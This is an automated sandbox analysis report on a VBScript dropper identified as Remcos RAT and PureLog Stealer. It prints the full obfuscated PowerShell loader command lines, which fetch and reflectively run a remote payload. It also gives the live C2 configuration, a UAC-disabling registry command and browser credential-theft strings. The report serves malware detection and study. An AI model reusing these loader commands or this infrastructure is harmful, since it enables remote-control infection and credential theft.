Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sostener.vbs

Overview

General Information

Sample name:sostener.vbs
Analysis ID:1519309
MD5:3b4164bdb4cf6c49570c95714f8c17a5
SHA1:13c7abef0333088056a8c11c951c97fcb878ad96
SHA256:fac857a7fa291be79831caef11498e067c036cd66812c7f1244b95b3e78a3ea4
Tags:vbsuser-lontze7
Infos:

Detection

Remcos, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 4780 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 3200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • AddInProcess32.exe (PID: 1836 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • AddInProcess32.exe (PID: 4188 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Version": "4.9.4 Pro", "Host:Port:Password": "newssssssssssssss.duckdns.org:2404:0", "Assigned name": "Matrix Fenix*", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-XDNGQ0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\registros.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6c4a8:$a1: Remcos restarted by watchdog!
        • 0x6ca20:$a3: %02i:%02i:%02i:%03i
        00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
        • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6656c:$str_b2: Executing file:
        • 0x675ec:$str_b3: GetDirectListeningPort
        • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x67118:$str_b7: \update.vbs
        • 0x66594:$str_b9: Downloaded file:
        • 0x66580:$str_b10: Downloading file:
        • 0x66624:$str_b12: Failed to upload file:
        • 0x675b4:$str_b13: StartForward
        • 0x675d4:$str_b14: StopForward
        • 0x67070:$str_b15: fso.DeleteFile "
        • 0x67004:$str_b16: On Error Resume Next
        • 0x670a0:$str_b17: fso.DeleteFolder "
        • 0x66614:$str_b18: Uploaded file:
        • 0x665d4:$str_b19: Unable to delete:
        • 0x67038:$str_b20: while fso.FileExists("
        • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
        00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
        • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
        • 0x6637c:$s1: CoGetObject
        • 0x66390:$s1: CoGetObject
        • 0x663ac:$s1: CoGetObject
        • 0x70338:$s1: CoGetObject
        • 0x6633c:$s2: Elevation:Administrator!new:
        Click to see the 17 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        7.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          7.2.AddInProcess32.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            7.2.AddInProcess32.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4a8:$a1: Remcos restarted by watchdog!
            • 0x6ca20:$a3: %02i:%02i:%02i:%03i
            7.2.AddInProcess32.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
            • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
            • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
            • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x6656c:$str_b2: Executing file:
            • 0x675ec:$str_b3: GetDirectListeningPort
            • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x67118:$str_b7: \update.vbs
            • 0x66594:$str_b9: Downloaded file:
            • 0x66580:$str_b10: Downloading file:
            • 0x66624:$str_b12: Failed to upload file:
            • 0x675b4:$str_b13: StartForward
            • 0x675d4:$str_b14: StopForward
            • 0x67070:$str_b15: fso.DeleteFile "
            • 0x67004:$str_b16: On Error Resume Next
            • 0x670a0:$str_b17: fso.DeleteFolder "
            • 0x66614:$str_b18: Uploaded file:
            • 0x665d4:$str_b19: Unable to delete:
            • 0x67038:$str_b20: while fso.FileExists("
            • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
            7.2.AddInProcess32.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
            • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            • 0x6637c:$s1: CoGetObject
            • 0x66390:$s1: CoGetObject
            • 0x663ac:$s1: CoGetObject
            • 0x70338:$s1: CoGetObject
            • 0x6633c:$s2: Elevation:Administrator!new:
            Click to see the 18 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Base64 Encoded PowerShell Command Detected
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5ID0gWycrJ1JlZmxlY3Rpb24uQXNzZW1ibHldJysnOjonKydMb2FkKCcrJ2s4ZicrJ2JpbmFyeUNvbnQnKydlbnQpO2s4ZicrJ3R5cGUgJysnPScrJyBrOGZhc3NlbScrJ2JsJysneS4nKydHZXRUeXAnKydlJysnKGM5JysnSVJ1blBFLkgnKydvbWVjOUkpOycrJ2s4ZicrJ21ldGhvZCA9ICcrJ2snKyc4ZnR5cGUnKycuR2V0TWV0JysnaG9kKGM5SVZBSWM5SSk7JysnazhmbWV0aG9kLkludicrJ29rZShrOGZudWxsLCcrJyBbb2InKydqZScrJ2N0W11dQChjOUkwL29Tc2tXL2QvZWUuJysnZScrJ3RzYXAvLycrJzpzcHR0aGM5SSAsJysnIGM5JysnSWQnKydlcycrJ2F0aXYnKydhZCcrJ29jOUknKycgJysnLCBjOUknKydkZXNhdGknKyd2YWRvYzknKydJICwgYzknKydJZGVzJysnYXRpdmFkb2M5SSxjJysnOUlBZGRJblByb2Nlc3MzMmM5SSxjOUljOUkpJysnKScpICAtY1JFcGxBQ0UgKFtDSGFSXTk5K1tDSGFSXTU3K1tDSGFSXTczKSxbQ0hhUl0zOSAgLXJFcExBY0UnazhmJyxbQ0hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|
            Sigma detected: Potential PowerShell Command Line Obfuscation
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5I
            Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzMsMTEsMl0tSm9JbicnKSAoKCgnazgnKydmdScrJ3InKydsID0gYzlJaHR0cHM6Ly9pYScrJzYwMDEwMC51cy4nKydhJysncmNoaXZlJysnLm9yZy8yNC9pdGVtcy9kZXRhaC1ub3RlLXYvRGV0YScrJ2hOb3RlVi50eHRjJysnOUk7azhmYicrJ2FzJysnZTY0Q29udCcrJ2VudCA9ICcrJyhOJysnZXctTycrJ2JqZWN0JysnIFN5c3RlbScrJy5OZXQuV2ViQ2xpZW50KS4nKydEb3dubG9hZCcrJ1N0JysncmluJysnZyhrOGZ1cmwpJysnO2snKyc4ZmJpbmEnKydyeUMnKydvbnRlbnQgPScrJyBbJysnU3knKydzdGVtLkMnKydvbnYnKydlJysncnRdOicrJzpGcm9tQmFzZScrJzY0U3RyaW5nKGs4ZmJhc2U2NEMnKydvbnQnKydlbnQnKycpO2s4ZmFzc2VtYmx5I
            Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
